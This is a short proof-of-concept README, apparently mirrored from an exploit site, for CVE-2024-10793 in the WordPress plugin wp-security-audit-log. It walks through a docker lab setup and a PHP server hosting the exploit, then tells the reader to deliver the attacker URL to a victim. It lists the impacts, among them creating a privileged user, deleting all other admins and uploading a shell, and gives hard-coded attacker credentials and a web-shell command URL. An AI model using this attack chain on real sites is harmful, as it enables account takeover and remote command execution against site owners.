Share
## https://sploitus.com/exploit?id=3CF9A51B-6381-5D55-90AA-796406B84F80
# CVE-2024-10793 PoC
Set this lines to your `hosts` file:
```
127.0.0.1 goodcms.lab
127.0.0.1 attacker.com
```
Launch Wordpress using docker:
```shell
$ sudo systemctl start docker
$ sudo docker-compose up -d
```
Open http://goodcms.lab:2121 and do installation wordpress steps.
Install wp-security-audit-log.5.2.1 or older versions in wordpress.
Launch attacker server:
```shell
$ php -S 0:9091 -t ./exploit
```
Deliver http://attacker.com to victim & Bingo!
Exploit Impacts:
- Add privileged user.
- Change current admin profile
- Delete all admins except hacker :)
- Shell Upload
- Logout

Account Takeover & Create Privileged User Poc:
Attacker credentials after exploit: { email: amin@attacker.com, username: amin, password: 123456 } (You can change from xpl.js code.)
Run Shell Command:
http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id
